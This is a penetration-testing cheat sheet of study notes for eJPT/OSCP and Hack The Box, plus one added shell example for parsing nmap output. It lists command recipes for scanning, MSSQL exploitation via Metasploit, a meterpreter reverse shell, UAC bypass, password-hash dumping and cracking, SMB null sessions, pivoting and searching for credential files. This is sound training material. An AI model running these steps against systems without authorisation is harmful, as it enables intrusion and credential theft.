pentest cheat sheet
Notes on the commands and information collected during my training for the eJPT and OSCP, and during CTFs / boxes on Hack The Box.
nmap
nmap -sn ip/24 -oN discovery.nmap
cat discovery.nmap | grep "for" | cut -d " " -f 5 > ips.txt
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
add -O for OS detection (note that -A above already includes OS detection, version detection, default scripts and traceroute)
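An added example (not part of the original notes) showing a more robust version of the `grep | cut` step above: the `cut -f 5` trick returns a hostname instead of an address whenever reverse DNS resolves, and this handles both forms. The scan output is a constructed sample, not a real discovery.nmap.

```shell
#!/bin/sh
# Added example, not from the original notes: extract the IPv4 address of
# every live host from "nmap -sn ... -oN discovery.nmap" output. The
# cheat sheet's 'cut -d " " -f 5' is right only when nmap prints the bare
# address; once reverse DNS resolves, the line reads
# "Nmap scan report for fileserver.lab (10.0.0.5)" and field 5 is the
# hostname. This version handles both forms and also skips hosts that a
# verbose scan lists as "[host down]".

# Constructed sample of nmap -oN (normal) output, embedded so it runs offline.
SAMPLE_SCAN='# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sn 10.0.0.0/29 -oN discovery.nmap
Nmap scan report for 10.0.0.1
Host is up (0.0010s latency).
Nmap scan report for fileserver.lab (10.0.0.5)
Host is up (0.0020s latency).
Nmap scan report for 10.0.0.6 [host down]
Nmap scan report for 10.0.0.7
Host is up (0.0030s latency).
# Nmap done at Mon Jan  1 00:00:01 2024 -- 8 IP addresses (3 hosts up) scanned in 0.50 seconds'

# extract_ips: read nmap normal output on stdin, print one address per line.
extract_ips() {
    grep '^Nmap scan report for ' |
        grep -v '\[host down\]' |
        sed -E 's/^Nmap scan report for //; s/^.*\(([0-9.]+)\)$/\1/'
}

# Same use as the cheat sheet pipeline (redirect to ips.txt to feed nmap -iL):
printf '%s\n' "$SAMPLE_SCAN" | extract_ips
```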
gobuster
gobuster dir -u 'url' -w /path/to/dir-list-med.txt (the dir subcommand is required from gobuster v3 onwards)
-U user (HTTP basic auth username)
-P pass (HTTP basic auth password)
mysql
connect
> mysql -u user -pPASS -h mysql_server --port=
see database
> show databases;
> use database_name;
see table
> show tables;
see content of tables
> SELECT * FROM accounts;
mssql (metasploit)
use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_enum
--> check the output for "xp_cmdshell is Enabled"
--> and "remote access is Enabled"
use exploit/windows/mssql/mssql_payload
metasploit / meterpreter
search XXX
use XXX
show payloads
show options
set payload windows/meterpreter/reverse_tcp (or linux/meterpreter/reverse_tcp)
background = send the current session to the background
sessions -l
sessions -i X
getuid
getsystem
--> if getsystem fails:
background
search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploit
getuid
getsystem
shell
search -f <filename>
hashdump (then John the Ripper to crack the hashes)
ssh
to log in with a found private key
save it to ~/.ssh/id_rsa and chmod 600 ~/.ssh/id_rsa (ssh refuses a key readable by others)
ssh -i ~/.ssh/id_rsa user@ip (-i takes the private key, not the .pub file)
enter the key's passphrase if it has one
dns
null session
enum4linux -a <ip>
<20> in the NetBIOS name table --> file server service is running, carry on with SMB enumeration
smbclient -L //<ip> -N
connect without pass
smbclient //<ip>/SHARE_NAME -N
routing
ip route add subnet/24 via <ip>
1) background meterpreter session
2) use post/multi/manage/autoroute
3) set SESSION 1
4) set SUBNET 172.16.50.0
5) set CMD add
6) run
find creds on windows
cd /
dir /s /b passwords.txt
dir /s /b credentials.txt